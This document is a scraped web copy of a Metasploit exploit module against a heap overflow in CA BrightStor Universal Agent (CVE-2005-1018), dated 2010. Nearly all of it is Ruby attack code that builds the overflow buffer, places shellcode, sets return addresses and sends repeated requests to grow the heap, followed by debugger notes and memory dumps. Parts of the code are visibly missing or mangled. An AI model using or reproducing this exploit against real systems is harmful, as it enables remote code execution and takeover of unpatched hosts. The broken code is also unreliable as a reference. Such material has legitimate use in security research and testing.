CA BrightStor Universal Agent – Remote Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2010-06-22
  • 类别:
  • 来源:
  • ##
    # $Id: universal_agent.rb 9583 2010-06-22 19:11:05Z todb $
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = AverageRanking
    	include Msf::Exploit::Remote::Tcp
    	def initialize(info = {})
    			'Name' => 'CA BrightStor Universal Agent Overflow',
    			'Description'=> %q{
    					This module exploits a convoluted heap overflow in the CA
    				BrightStor Universal Agent service. Triple userland
    				exception results in heap growth and execution of
    				dereferenced function pointer at a specified address.
    			'Author' => [ 'hdm' ],
    			'License'=> MSF_LICENSE,
    			'Version'=> '$Revision: 9583 $',
    			'References' =>
    					[ 'CVE', '2005-1018'],
    					[ 'OSVDB', '15471' ],
    					[ 'BID', '13102'],
    					[ 'URL', ''],
    			'Privileged' => true,
    					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
    					'Space'=> 164,
    					'BadChars' => "\x00",
    					'StackAdjustment' => -3500,
    						'Magic Heap Target #1',
    							'Platform' => 'win',
    							'Ret'=> 0x01625c44, # We grow to our own return address
    			'DisclosureDate' => 'Apr 11 2005',
    			'DefaultTarget' => 0))
    			], self.class)
    	def exploit
    		print_status("Trying target #{}...")
    		# The server reverses four bytes starting at offset 0xa5 :0
    		# Create the overflow string
    		boom = 'X' * 1024
    		# Required field to trigger the fault
    		boom[248, 2] = [1000].pack('V')
    		# The shellcode, limited to 250 bytes (no nulls)
    		boom[256, payload.encoded.length] = payload.encoded
    		# This should point to itself
    		boom[576, 4] = [target.ret].pack('V')
    		# This points to the code below
    		boom[580, 4] = [target.ret + 8].pack('V')
    		# We have 95 bytes, use it to hop back to shellcode
    		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"
    		# Stick the protocol header in front of our request
    		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom
    		# We keep making new connections and triggering the fault until
    		# the heap is grown to encompass our known return address. Once
    		# this address has been allocated and filled, each subsequent
    		# request will result in our shellcode being executed.
    		1.upto(200) {|i|
    			print_status("Sending request #{i} of 200...") if (i % 10) == 0
    			# Give the process time to recover from each exception
    012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
    012a0d97 83c404 add esp,0x4
    012a0d9a 85c9 testecx,ecx
    012a0d9c 7407 jzntagent+0x20da5 (012a0da5)
    012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
    012a0da0 6a01 push0x1
    012a0da2 ff5204 calldword ptr [edx+0x4]
    Each request will result in another chunk being allocated, the exception
    causes these chunks to never be freed. The large chunk size allows us to
    predict the location of our buffer and grow our buffer to where we need it.
    If these addresses do not match up, run this exploit, then attach with WinDbg:
    > s 0 Lfffffff 0x44 0x5c 0x61 0x01
    Figure out the pattern, replace the return address, restart the service,
    and run it through again. Only tested on WinXP SP1
    011b5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    011c5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    011d5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    011e5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    011f5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01205c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    [ snip ]
    01605c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01615c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01625c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01635c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01645c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01655c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01665c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01675c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01685c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01695c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    016a5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    016b5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    016c5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    016d5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    01725c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........
    017e5c4448 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc ccH\b.L\b.........